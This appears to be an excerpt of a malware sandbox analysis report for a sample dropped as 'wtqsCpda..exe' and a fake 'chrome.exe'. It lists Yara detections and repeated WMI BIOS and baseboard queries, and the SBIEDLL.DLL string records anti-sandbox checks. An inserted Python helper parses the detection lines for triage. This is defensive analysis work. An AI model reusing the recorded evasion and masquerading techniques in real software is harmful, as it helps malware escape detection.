Source: Yara match File source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.chrome.exe.a20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.2b22c9c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.80097480691.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.80087663971.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.83499752484.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80247515540.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.80088120152.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79892756744.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79892233843.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.80404784517.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80246486829.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79893250831.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.80311999722.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.80246995488.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.79893776213.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wtqsCpda..exe PID: 1033924, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: schtasks.exe PID: 1034124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chrome.exe PID: 1034204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chrome.exe PID: 6672, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, type: DROPPED
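The `Source:` lines above mix three kinds of evidence: on-disk DROPPED files, `*.unpack` images the sandbox rebuilt from memory, and raw `*.sdmp` memory dumps. The dump names encode where in the process the Yara rule fired, and that is what tells an analyst whether the match is the dropped binary itself or a payload unpacked at runtime. The following is an added triage helper, not part of the Joe Sandbox report or its tooling. It reads the first hex field of an `.sdmp` name as the process index (cross-checked against the decimal prefix of the unpack names: 0x0F = 15 = wtqsCpda..exe, 0x13 = 19 = chrome.exe), the second as the dump stage, the fourth as the region base address, and the seventh as the region's `MEMORY_BASIC_INFORMATION.Type` (0x01000000 = MEM_IMAGE, 0x00020000 = MEM_PRIVATE); that last decoding is an assumption based on the values matching the Win32 constants, not documented report semantics.

```python
import re
from collections import defaultdict

# Constructed input: a handful of "Source:" lines copied from the Yara-match list above.
SAMPLE_LINES = [
    "Source: Yara match File source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 0000000F.00000002.80311999722.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY",
    "Source: Yara match File source: 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY",
    "Source: Yara match File source: Process Memory Space: chrome.exe PID: 6672, type: MEMORYSTR",
    r"Source: Yara match File source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED",
]

LINE_RE = re.compile(r"^Source: Yara match File source: (?P<src>.+), type: (?P<kind>[A-Z]+)$")
# <index>.<stage>.<snapshot>.<base>.<f5>.<f6>.<type>.<f8>.sdmp
SDMP_RE = re.compile(
    r"^(?P<idx>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<snap>\d+)\.(?P<base>[0-9A-F]{16})\."
    r"(?P<f5>[0-9A-F]{8})\.(?P<f6>[0-9A-F]{8})\.(?P<mtype>[0-9A-F]{8})\.(?P<f8>[0-9A-F]{8})\.sdmp$"
)
# <index>.<stage>.<process name>.<base>.<n>[.raw].unpack  (process names may contain dots)
UNPACK_RE = re.compile(r"^(?P<idx>\d+)\.(?P<stage>\d+)\.(?P<proc>.+)\.(?P<base>[0-9a-f]+)\.(?P<n>\d+)(?P<raw>\.raw)?\.unpack$")
MEMSTR_RE = re.compile(r"^Process Memory Space: (?P<proc>.+) PID: (?P<pid>\d+)$")

# Assumption: the seventh dump-name field is the MEMORY_BASIC_INFORMATION.Type value.
MEM_TYPES = {0x01000000: "image", 0x00020000: "private", 0x00040000: "mapped"}


def parse_source(line):
    """Decode one 'Source:' line into a record, or None if it is not a Yara source line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    src, kind = m.group("src"), m.group("kind")
    if kind == "MEMORY":
        d = SDMP_RE.match(src)
        if not d:
            return None
        return {"kind": "memory", "index": int(d["idx"], 16), "stage": int(d["stage"], 16),
                "base": int(d["base"], 16), "region": MEM_TYPES.get(int(d["mtype"], 16), "unknown")}
    if kind == "UNPACKEDPE":
        d = UNPACK_RE.match(src)
        if not d:
            return None
        return {"kind": "unpack", "index": int(d["idx"]), "stage": int(d["stage"]),
                "process": d["proc"], "base": int(d["base"], 16), "raw": bool(d["raw"])}
    if kind == "MEMORYSTR":
        d = MEMSTR_RE.match(src)
        if not d:
            return None
        return {"kind": "memstr", "process": d["proc"], "pid": int(d["pid"])}
    if kind == "DROPPED":
        return {"kind": "dropped", "path": src}
    return {"kind": kind.lower(), "source": src}


def summarize(lines):
    """Group Yara hits per process index: how many fell in image vs. private memory."""
    by_index = defaultdict(lambda: {"process": None, "unpack": 0, "image": 0, "private": 0, "private_bases": set()})
    dropped = []
    for line in lines:
        rec = parse_source(line)
        if rec is None:
            continue
        if rec["kind"] == "unpack":
            entry = by_index[rec["index"]]
            entry["process"] = rec["process"]   # the unpack name is what ties the hex index to a process
            entry["unpack"] += 1
        elif rec["kind"] == "memory":
            entry = by_index[rec["index"]]
            if rec["region"] in ("image", "private"):
                entry[rec["region"]] += 1
            if rec["region"] == "private":
                entry["private_bases"].add(rec["base"])
        elif rec["kind"] == "dropped":
            dropped.append(rec["path"])
    return dict(by_index), dropped


if __name__ == "__main__":
    summary, dropped_files = summarize(SAMPLE_LINES)
    for idx, entry in sorted(summary.items()):
        bases = ", ".join(hex(b) for b in sorted(entry["private_bases"])) or "-"
        print(f"process {idx:2d} {entry['process'] or '?':16s} image={entry['image']} private={entry['private']} private bases: {bases}")
    print("dropped:", dropped_files)
```

On the lines above this shows the distinction that matters for triage: the wtqsCpda..exe hit at 0x2B22000 lies in a private (heap) region, the same region the sandbox rebuilt as `15.2.wtqsCpda..exe.2b22c9c.1.unpack`, so that process unpacked the payload at runtime; the chrome.exe hits (index 19) all sit in its image at 0xA22000, consistent with the dropped `chrome.exe` being the payload itself.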
Source: chrome.exe, chrome.exe, 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
